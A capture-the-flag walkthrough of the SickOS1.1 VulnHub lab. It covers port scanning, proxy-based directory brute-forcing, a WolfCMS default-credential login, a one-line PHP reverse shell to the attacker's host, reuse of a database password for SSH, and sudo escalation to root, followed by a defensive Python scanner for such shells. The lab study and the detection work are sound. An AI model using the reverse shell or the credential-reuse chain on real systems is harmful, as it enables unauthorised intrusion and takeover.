SickOS1.1
Target VM download: https://download.vulnhub.com/sickos/sick0s1.1.7z

## Information Gathering

1. Identify the target's IP address.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sn 192.168.186.0/24
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 22:59 EDT
Nmap scan report for 192.168.186.1 (192.168.186.1)
Host is up (0.00055s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.186.2 (192.168.186.2)
Host is up (0.00017s latency).
MAC Address: 00:50:56:EC:88:83 (VMware)
Nmap scan report for 192.168.186.133 (192.168.186.133)
Host is up (0.00026s latency).
MAC Address: 00:0C:29:79:2C:FF (VMware)
Nmap scan report for 192.168.186.254 (192.168.186.254)
Host is up (0.00018s latency).
MAC Address: 00:50:56:EF:45:80 (VMware)
Nmap scan report for 192.168.186.128 (192.168.186.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.94 seconds
```

The target's address is 192.168.186.133.

2. Scan the target's ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 23:00 EDT
Nmap scan report for 192.168.186.133 (192.168.186.133)
Host is up (0.00043s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:79:2C:FF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 23:01 EDT
Nmap scan report for 192.168.186.133 (192.168.186.133)
Host is up (0.00039s latency).
All 65535 scanned ports on 192.168.186.133 (192.168.186.133) are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
MAC Address: 00:0C:29:79:2C:FF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
```

Open ports: 22, 3128, 8080 (closed).

3. Detect service types and versions, fingerprint the operating system, and run the basic script scan.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -sC -O -p22,3128,8080 192.168.186.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 23:03 EDT
Nmap scan report for 192.168.186.133 (192.168.186.133)
Host is up (0.00035s latency).

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:79:2C:FF (VMware)
Aggressive OS guesses: Linux 3.2 - 4.14 (95%), Linux 3.8 - 3.16 (95%), Linux 3.10 - 4.11 (92%), Linux 3.13 - 4.4 (92%), Linux 3.13 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Android 8 - 9 (Linux 3.18 - 4.4) (91%), Linux 3.2 - 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds
```

Findings:

- Port 22 is an SSH service.
- Port 3128 returns `http-server-header: squid/3.1.19`.

> squid

"Squid-HTTP service" usually refers to the service provided by **Squid acting as an HTTP proxy server**. Squid is an open-source, high-performance proxy and web cache server, mainly used to handle requests over HTTP, HTTPS, FTP and other protocols. Its core function is to improve network access efficiency by caching and forwarding requests, and it also provides additional features such as access control and content filtering.

## Port 3128

Configure the browser to use the proxy.

## Port 80

With the proxy set, browse directly to the target's IP address.

> Directory scan

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ dirb http://192.168.186.133/ -p http://192.168.186.133:3128/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 6 23:14:37 2025
URL_BASE: http://192.168.186.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.186.133:3128/

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.186.133/ ----
+ http://192.168.186.133/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.186.133/connect (CODE:200|SIZE:109)
+ http://192.168.186.133/index (CODE:200|SIZE:21)
+ http://192.168.186.133/index.php (CODE:200|SIZE:21)
+ http://192.168.186.133/robots (CODE:200|SIZE:45)
+ http://192.168.186.133/robots.txt (CODE:200|SIZE:45)
+ http://192.168.186.133/server-status (CODE:403|SIZE:296)

-----------------
END_TIME: Mon Oct 6 23:14:39 2025
DOWNLOADED: 4612 - FOUND: 7
```

robots.txt reveals wolfcms.

## wolfcms

A quick look around shows that the site has only just been set up and has very little content.

Admin login path: `?/admin/login`

Trying weak credentials to log in works: the username and the password are both `admin`.

Browsing the admin panel shows that PHP code can be added to the source files and that files can be uploaded, so a PHP reverse shell is chosen this time.

> PHP reverse shell

```php
<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.186.128/443 0>&1'"); ?>
```

At the same time, listen on port 443 on Kali.

Visit this path: `http://192.168.186.133/wolfcms/?articles.html`

The shell connects back successfully.

## Privilege Escalation

Generally speaking, www-data is a service account.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nc -lnvp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.186.128] from (UNKNOWN) [192.168.186.133] 35783
bash: no job control in this shell
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
www-data@SickOs:/var/www/wolfcms$
```

Listing the current directory reveals a config.php file.

```php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);

// The number of seconds before the check for a new Wolf version times out in case of problems.
define('CHECK_TIMEOUT', 3);

"./config.php" 85L, 3058C
```

The file contains a username and a password.

Trying them against port 22 fails.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh root@192.168.186.133
The authenticity of host '192.168.186.133 (192.168.186.133)' can't be established.
ECDSA key fingerprint is SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.186.133' (ECDSA) to the list of known hosts.
root@192.168.186.133's password:
Permission denied, please try again.
root@192.168.186.133's password:
Permission denied, please try again.
```

Look at /etc/passwd to see which other users exist.

```bash
www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
john@123
```

Note that the sickos user is assigned /bin/bash as its shell. Try logging in as that user with the password john@123.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh sickos@192.168.186.133
sickos@192.168.186.133's password:
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Oct 7 09:06:46 IST 2025

  System load:  0.0               Processes:           117
  Usage of /:   4.3% of 28.42GB   Users logged in:     0
  Memory usage: 11%               IP address for eth0: 192.168.186.133
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

124 packages can be updated.
92 updates are security updates.

New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Sep 22 08:32:44 2015
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
```

> sudo privilege escalation

```bash
sickos@SickOs:~$ sudo -l
[sudo] password for sickos:
Sorry, try again.
[sudo] password for sickos:
Matching Defaults entries for sickos on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~# cd /root
root@SickOs:/root# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat ./a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying
```
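The reverse shell in the wolfcms section was planted by editing page content through the CMS admin panel. As an added example (not part of the original write-up), the Python below shows how a defender could scan exported page bodies for PHP that calls command-execution functions, raising the severity when the same block also references a `/dev/tcp` socket. The `scan_content` and `scan_all` helpers, the severity labels and the `SAMPLE_CONTENT` records are assumptions constructed for illustration; how page bodies are exported from the CMS is outside the example.

```python
import re

# PHP functions that pass a string to the operating-system shell.
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
EXEC_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.IGNORECASE)
# Bash pseudo-device that opens an outbound socket: /dev/tcp/<host>/<port>.
NET_RE = re.compile(r"/dev/(?:tcp|udp)/([\w.\-]+)/(\d{1,5})")
# Body of each PHP block; an unterminated block runs to the end of the text.
PHP_BLOCK_RE = re.compile(r"<\?(?:php|=)?(.*?)(?:\?>|\Z)", re.DOTALL | re.IGNORECASE)

# Constructed sample of exported page bodies. "articles" mirrors the page the
# write-up modified; the other names and bodies are hypothetical.
SAMPLE_CONTENT = {
    "articles": "<h2>Articles</h2>\n<?php shell_exec(\"/bin/bash -c 'bash -i >& "
                "/dev/tcp/192.168.186.128/443 0>&1'\"); ?>",
    "about-us": "<p>About</p><?php echo date('Y'); ?>",
    "sidebar": "<?php echo system('uptime'); ?>",
}


def scan_content(name, body):
    """Return findings for one stored page body (hypothetical helper)."""
    findings = []
    for block in PHP_BLOCK_RE.finditer(body):
        code = block.group(1)
        calls = sorted({m.group(1).lower() for m in EXEC_RE.finditer(code)})
        sockets = [(m.group(1), int(m.group(2))) for m in NET_RE.finditer(code)]
        if not calls:
            continue  # plain templating such as echo date('Y')
        # Shell execution plus an outbound socket is the reverse-shell shape.
        severity = "high" if sockets else "review"
        findings.append({"item": name, "severity": severity,
                         "calls": calls, "sockets": sockets})
    return findings


def scan_all(pages):
    """Scan every page body and list high-severity findings first."""
    results = [f for name, body in pages.items() for f in scan_content(name, body)]
    return sorted(results, key=lambda f: (f["severity"] != "high", f["item"]))


if __name__ == "__main__":
    for finding in scan_all(SAMPLE_CONTENT):
        print(finding)
```

A "review" finding is not proof of compromise; it marks content where an editor account was able to store shell-executing PHP at all.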
毛林
October 7, 2025, 11:52